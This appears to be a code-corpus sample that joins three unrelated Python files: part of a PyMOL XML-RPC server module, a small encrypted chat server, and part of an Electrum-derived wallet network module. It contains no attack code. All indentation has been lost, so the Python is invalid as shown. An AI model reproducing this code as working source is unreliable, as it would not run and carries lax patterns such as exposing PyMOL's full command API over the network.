id: (OPTIONAL) the name of the object to be created
color2: (OPTIONAL) a 3 tuple with the color of end2 of the sphere. (1,1,1)
is white
extend: (OPTIONAL) if this is nonzero, the object will be cleared
before adding the new sphere. Otherwise the sphere is appended
to the ojbect
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
NOTE: the reason that color2 follows id is that I think clients are
going to be interested in setting the id more often than they are going
to care about the second color.
"""
global cgoDict
if color2 is None: color2 = color1
r1,g1,b1 = color1
r2,g2,b2 = color2
x1,y1,z1 = end1
x2,y2,z2 = end2
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcDeleteObject(objName):
""" deletes an object """
try:
cmd.delete(objName)
except:
res = 0
else:
res = 1
return res
def rpcDeleteAll():
""" deletes all objects """
res = cmd.delete('all')
if res is not None:
return res
else:
return ''
def colorObj(objName,colorScheme):
""" sets an molecule's color scheme
Arguments:
- objName: the object (molecule) to change
- colorScheme: name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
"""
if colorScheme:
if colorScheme == 'std':
# this is an adaptation of the cbag scheme from util.py, but
# with a gray carbon.
cmd.color("magenta","("+objName+")",quiet=1)
cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
cmd.color("gray","(elem C and "+objName+")",quiet=1)
elif hasattr(utils,colorScheme):
fn = getattr(utils,colorScheme)
fn(objName,quiet=1)
res = 1
else:
res = 0
return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
""" loads a molecule from a pdb string
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_pdbstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
""" loads a molecule from a mol block
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_molstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
""" loads an object from a file
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
colorScheme: (OPTIONAL) name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
if not objName:
objName = fileName.split('.')[0]
if replace:
cmd.delete(objName)
res = cmd.load(fileName,objName,format=format)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadSurface(fileName,objName,format='',surfaceLevel=1.0):
""" loads surface data from a file and adds an isosurface
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
if not objName:
objName = fileName.split('.')[0]
gridName = 'grid-%s'%objName
res = cmd.load(fileName,gridName,format='')
cmd.isosurface(objName,gridName,level=surfaceLevel)
if res is not None:
return res
else:
return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
""" loads surface data from a string and adds an isosurface
Arguments:
data: the data to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
gridName = 'grid-%s'%objName
# it would be nice if we didn't have to go by way of the temporary file,
# but at the moment pymol will only read shapes from files
tempnm = tempfile.mktemp('.grd')
open(tempnm,'w+').write(data)
res = rpcLoadSurface(tempnm,objName,format='',surfaceLevel=surfaceLevel)
os.unlink(tempnm)
if res is not None:
return res
else:
return ''
def rpcRotate(vect,objName='',state=-1):
""" rotates objects
Arguments:
- vect: a sequence with x y and z rotations
- objName: (OPTIONAL) object to be rotated
- state: (OPTIONAL) if zero only visible states are rotated,
if -1 (the default), all states are rotated
"""
cmd.rotate('x',vect[0],objName,state=state)
cmd.rotate('y',vect[1],objName,state=state)
cmd.rotate('z',vect[2],objName,state=state)
return 1
def rpcGetNames(what='selections',enabledOnly=1):
""" returns the results of cmd.get_names(what) """
return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
""" returns the results of cmd.id_atom(what) """
return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
""" returns the results of cmd.get_atom_coords(what,state) """
return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
""" returns general help text or help on a particular command """
global serv
res = 'Command Not Found'
if not what:
res = list(serv.funcs.keys())
else:
funcs = serv.funcs
if what in funcs:
fn = funcs[what]
res = "Function: %s("%what
defs = fn.__defaults__
if defs:
code = fn.__code__
nDefs = len(defs)
args = []
i = -1
for i in range(code.co_argcount - nDefs):
args.append(code.co_varnames[i])
for j in range(nDefs):
vName = code.co_varnames[j+i+1]
args.append("%s=%s"%(vName,repr(defs[j])))
res += ','.join(args)
res += ')\n'
if fn.__doc__:
res += fn.__doc__
return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
""" launches the xmlrpc server into a separate thread
Arguments:
hostname: (OPTIONAL) name of the host for the server
(defaults to be the name of the localhost)
port: (OPTIONAL) the first port to try for the server
nToTry: (OPTIONAL) the number of possible ports to try
(in case the first can't be opened)
"""
if not hostname:
import os
hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
global cgoDict,serv
cgoDict = {}
for i in range(nToTry):
try:
serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
allow_none=True)
except:
serv = None
else:
break
if serv:
print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
# import PyMOL API
from pymol import api
serv.register_instance(cmd)
# legacy stuff with unique names
serv.register_function(rpcPing,'ping')
serv.register_function(rpcResetCGO,'resetCGO')
serv.register_function(rpcRenderCGO,'renderCGO')
serv.register_function(rpcSphere,'sphere')
serv.register_function(rpcSpheres,'spheres')
serv.register_function(rpcCylinder,'cylinder')
serv.register_function(rpcDeleteObject,'deleteObject')
serv.register_function(rpcDeleteAll,'deleteAll')
serv.register_function(rpcLoadPDB,'loadPDB')
serv.register_function(rpcLoadMolBlock,'loadMolBlock')
serv.register_function(rpcLoadSurface,'loadSurface')
serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
serv.register_function(rpcLoadFile,'loadFile')
serv.register_function(rpcGetNames,'getNames')
serv.register_function(api.count_atoms,'countAtoms')
serv.register_function(rpcIdAtom,'idAtom')
serv.register_function(rpcHelp,'help')
serv.register_function(rpcGetAtomCoords,'getAtomCoords')
# legacy stuff, should be removed because overwrites API names!
serv.register_function(rpcLabel,'label') # pseudoatom
serv.register_function(rpcRotate,'rotate')
serv.register_introspection_functions()
t = threading.Thread(target=serv.serve_forever)
t.setDaemon(1)
t.start()
else:
print('xml-rpc server could not be started')
# vi:expandtab:smarttab:sw=2
|
Server.py | #!/usr/bin/env python
import socket
import time
import random
import os
from threading import Thread
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_OAEP
import ast
from AESCipher import AESCipher
import configparser
import argparse
def parse_config():
global privateKeyFile, port, max_users, debug, allow_encryption
privateKeyFile_default = 'private.pem'
port_default = 5006
max_users_default = 2048
debug_default = False
config_file_default = 'server.ini'
allow_encryption_default = True
config = configparser.ConfigParser()
config.read(config_file)
section = "Server"
try:
config_server = config[section]
except:
privateKeyFile = privateKeyFile_default
port = port_default
max_users = max_users_default
debug = debug_default
allow_encryption = allow_encryption_default
if config_file != config_file_default:
print("\nSomething wrong with config file ({}).\n".format(config_file))
return
errorWith = []
privateKeyFile = config_server.get('privatekeyfile', privateKeyFile_default)
try:
port = config_server.getint('port', port_default)
except:
errorWith.append('port')
port = port_default
try:
max_users = config_server.getint('maxusers', max_users_default)
except:
errorWith.append('maxusers')
max_users = max_users_default
try:
allow_encryption = config_server.getboolean('allowencryption', allow_encryption_default)
except:
errorWith.append('allowencryption')
allow_encryption = allow_encryption_default
try:
debug = config_server.getboolean('debug', debug_default)
except:
errorWith.append('debug')
debug = debug_default
if errorWith: print('\nErrors with loading [{}] from config file.\n'.format(', '.join(errorWith)))
def parse_args():
parser = argparse.ArgumentParser(description='Provides a dedicated server for Clients to connect to.\nAll settings here override the config file.')
parser.add_argument('-p', '--port', type=int, help='Specify the port number to host on.', action='store')
parser.add_argument('-m', '--maxusers', type=int, help='Specify the max number of users that can connect.', action='store')
parser.add_argument('-pK', '--privatekey', help='Specify the private key to use.', action='store')
parser.add_argument('-c', '--config', help='Specify the config file to use.', action='store')
parser.add_argument('-dE', '--dontencrypt', help="Specify if clients shouldn't be able to use encryption when connecting.", action='store_true')
parser.add_argument('-d', '--debug', help=argparse.SUPPRESS, action='store_true')
args = parser.parse_args()
global config_file, privateKeyFile, port, max_users, allow_encryption, debug
if args.config:
config_file = args.config
parse_config()
if args.privatekey:
privateKeyFile = args.privatekey
if args.maxusers:
max_users = args.maxusers
if args.port:
port = args.port
if args.dontencrypt:
allow_encryption = not args.dontencrypt
if args.debug:
debug = args.debug
def decryptRSA(encrypted):
decryptor = PKCS1_OAEP.new(privateKey)
decrypted = decryptor.decrypt(ast.literal_eval(str(encrypted)))
return decrypted
def encryptRSA(decrypted):
encryptor = PKCS1_OAEP.new(publicKey)
encrypted = encryptor.encrypt(decrypted)
return encrypted
def decryptAES(encrypted, key):
decryptor = AESCipher(key)
decrypted = decryptor.decrypt(encrypted)
return decrypted
def encryptAES(decrypted, key):
encryptor = AESCipher(key)
encrypted = encryptor.encrypt(decrypted)
return encrypted
def broadcast(message, senderID):
for eachID, eachConn in connections.items():
if eachID != senderID:
if keys.get(eachID):
eachConn.send(encryptAES(message, keys[eachID]))
else:
eachConn.send(message)
def hereList():
return "Here exists {}.".format(', '.join(list(names.values())))
def getID():
rand = random.randint(0, max_users - 1)
while rand in list(names.keys()):
rand = random.randint(0, max_users - 1)
return rand
def talk(conn, addr):
print("Opening connection with {}.".format(addr))
try:
rand = getID()
ID = str(rand)
connections[ID] = conn
initialMessage = conn.recv(1024)
try:
key = decryptRSA(initialMessage)
keys[ID] = key
nameEnc = conn.recv(1024)
name = decryptAES(nameEnc, key).decode('utf-8')
if not allow_encryption:
conn.send(encryptAES(b'Encryption is not allowed here.', key))
return
except ValueError as err:
try:
name = initialMessage.decode('utf-8')
except Exception as err:
print("Malformed input, kicking.")
conn.send(b'Malformed input, kicking.')
if debug:
print(err)
return
except Exception as err:
print("Malformed input, kicking.")
conn.send(b'Malformed input, kicking.')
if debug:
print(err)
return
names[ID] = name
print("They are {} with the ID of {}.".format(name, ID))
if keys.get(ID):
conn.send(encryptAES(hereList().encode('utf-8'), key))
else:
conn.send(hereList().encode('utf-8'))
broadcast("{} has joined.".format(name).encode('utf-8'), ID)
while True:
try:
if keys.get(ID):
dataEnc = conn.recv(1024)
data = decryptAES(dataEnc, key)
else:
data = conn.recv(1024)
except Exception as err:
print("Error Receiving")
data = b'exit'
if debug:
print(err)
if data == b'I am out.' or data == b'exit' or data == b'quit':
break
elif data == b'who':
if keys.get(ID):
conn.send(encryptAES(hereList().encode('utf-8'), key))
else:
conn.send(hereList().encode('utf-8'))
elif data:
message = "{}> {}".format(name, data.decode('utf-8'))
message = message.encode('utf-8')
broadcast(message, ID)
else:
message = "{}> {}".format(name, data.decode('utf-8'))
message = message.encode('utf-8')
broadcast(message, ID)
finally:
try:
if connections.get(ID):
del connections[ID]
if keys.get(ID):
del keys[ID]
if names.get(ID):
del names[ID]
print("Closed connection with {}.".format(addr))
print("They were {} with the ID of {}.".format(name, ID))
message = "{} has left.".format(name).encode('utf-8')
broadcast(message, ID)
except Exception as err:
print("Some kind of error in cleaning up that connection. They probably didn't have a name or key.")
if debug:
print(err)
conn.close()
def listening():
while True:
conn, addr = s.accept()
Thread(target=talk, args=(conn, addr)).start()
if __name__ == "__main__":
print("SERVER")
config_file = "server.ini"
parse_config()
parse_args()
if debug:
print("DEBUG")
#exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0",port))
s.listen(5)
with open(privateKeyFile, "r") as file:
privateKeyString = file.read()
privateKey = RSA.import_key(privateKeyString)
connections = {}
names = {}
keys = {}
thread = Thread(target=listening)
thread.daemon = True
thread.start()
try:
while True:
time.sleep(100)
except KeyboardInterrupt:
s.close()
print("Closing Server")
exit() |
network.py | # Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import json
import errno
import queue
import random
import select
import socket
import threading
import time
from collections import defaultdict
import re
import socks
from . import bitcoin
from . import blockchain
from . import util
from .btn import *
from . import constants
from .interface import Connection, Interface
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = constants.net.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = constants.net.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'), p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote btn_electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
self.downloading_headers = False
dir_path = os.path.join(self.config.path, 'certs')
util.make_dir(dir_path)
# subscriptions and requests
self.subscribed_addresses = set()
self.subscribed_tokens = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.requested_chunks = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w", encoding='utf-8') as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
for k in list(self.blockchains.keys()):
if not self.blockchains[k].is_valid():
for server in list(self.interfaces.keys()):
interface = self.interfaces[server]
if interface.blockchain and interface.blockchain is self.blockchains[k]:
self.close_interface(interface)
del self.blockchains[k]
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests),
len(self.subscribed_addresses), len(self.subscribed_tokens))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
# self.queue_request('server.donation_address', [])
#self.queue_request('server.peers.subscribe', [])
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
self.queue_request('blockchain.relayfee', [])
for h in list(self.subscribed_addresses):
self.queue_request('blockchain.scripthash.subscribe', [h])
for hash160, contract_addr, topic in list(self.subscribed_tokens):
self.queue_request('blockchain.contract.event.subscribe', [hash160, contract_addr, topic])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = constants.net.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result is not None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.fee_estimates[i] = fee
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None and result is not None and result > 0:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.headers':
self.on_block_headers(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
if method == 'blockchain.contract.event.subscribe':
return '{}:{}:{}:{}'.format(method, params[0], params[1], params[2])
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
elif method == 'blockchain.contract.event.subscribe':
self.subscribed_tokens.add((params[0], params[1], params[2]))
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
elif method == 'blockchain.contract.event.subscribe':
response['params'] = params[0:3] # addr, contract, topic
response['result'] = params[3]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def map_scripthash_to_address(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hash2address = {bitcoin.address_to_scripthash(address): address for address in addresses}
self.h2addr.update(hash2address)
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hash2address.keys()]
self.send(msgs, self.map_scripthash_to_address(callback))
def request_address_history(self, address, callback):
h = bitcoin.address_to_scripthash(address)
self.h2addr.update({h: address})
self.send([('blockchain.scripthash.get_history', [h])], self.map_scripthash_to_address(callback))
def subscribe_tokens(self, tokens, callback):
msgs = [(
'blockchain.contract.event.subscribe',
[bh2u(b58_address_to_hash160(token.bind_addr)[1]), token.contract_addr, TOKEN_TRANSFER_TOPIC])
for token in tokens]
self.send(msgs, callback)
def request_token_balance(self, token, callback):
"""
:type token: Token
:param callback:
:return:
"""
__, hash160 = b58_address_to_hash160(token.bind_addr)
hash160 = bh2u(hash160)
datahex = '70a08231{}'.format(hash160.zfill(64))
self.send([('blockchain.contract.call', [token.contract_addr, datahex, '', 'int'])],
callback)
def request_token_history(self, token, callback):
__, hash160 = b58_address_to_hash160(token.bind_addr)
hash160 = bh2u(hash160)
